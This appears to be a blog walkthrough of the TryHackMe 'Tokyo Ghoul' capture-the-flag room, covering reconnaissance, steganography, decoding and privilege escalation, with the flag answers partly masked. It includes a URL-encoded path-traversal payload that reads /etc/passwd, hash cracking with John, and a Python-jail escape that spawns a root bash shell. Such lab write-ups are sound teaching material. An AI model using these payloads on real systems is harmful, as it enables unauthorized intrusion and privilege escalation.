TryHackMe: Tokyo Ghoul

Today we will take a look at TryHackMe: Tokyo Ghoul My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes. Then you can start watching the anime. ;)

Recon

Task 1: About the room

# Read the above

> No answer needed

# Deploy the machine

> No answer needed

Task 2: Where am i ?

#Use nmap to scan all ports

Command: sudo nmap -sS -sC -sV -oN nmap/initial $IP

# How many ports are open ?

Answer: *

# What is the OS used ?

> U*****

Task 3: Planning to escape

#Did you find the note that the others ghouls gave you? where did you find it ?

> j********.****

# What is the key for Rize executable?

##Let’s check the ftp port and get the files we need from inside

Command: ftp IP

##Let’s look at the files.

## Here we see the ELF (Extensible Linking Format) File

## Let’s give the authority to work

Command: sudo chmod +x need_to_talk

Command: ./need_to_talk

## Return the characters to the letters using the Strings command

Command: strings need_to_talk

> k********

# Use a tool to get the other note from Rize .

## Let’s restart the file because we found the password.

## Now let’s get the note from the picture with the given paraphrase

Command: steghide extract -sf rize_and_kaneki.jpg

Task 4 What Rize is trying to say?

# What the message mean did you understand it ? what it says?

## When we open the text, we are greeted by the Morse code.

## Let’s try to read

## We are confronted with mixed codes. We do not know what it is, so we turn to CyberChef

> d***************

# Can you see the weakness in the dark ? no ? just search

## Let’s check the site directory

> gobuster dir -u http://10.10.255.75/d******/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

## The new page gives us a choice, I checked both and they come to the same place.

# What did you find something ? crack it

## I wanted to look for LFI, but he answered me like this

## So you need to bypass the back filter. Let’s do some research.

https://raw.githubusercontent.com/emadshanab/LFI-Payload-List/master/LFI%20payloads.txt

## /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

## I’m not silly dude ;)

# What is rize username ?

> k********

# What is rize password ?

## Let’s use John and the rockyou list.

Command: sudo john hash — wordlist=/usr/share/wordlists/rockyou.txt

> p**********

Task 5: Fight Jason

# User.txt

## Let’s connect with ssh.

Command: ssh username@IP

# root.txt

## Check list the allowed commands

Command: sudo -l

## We see jail python here. After some research, I found a bypass

Command: __builtins__.__dict__[‘__IMPORT__’.lower()](‘PTY’.lower()).__dict__[‘SPAWN’.lower()](‘/bin/bash’)

## And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store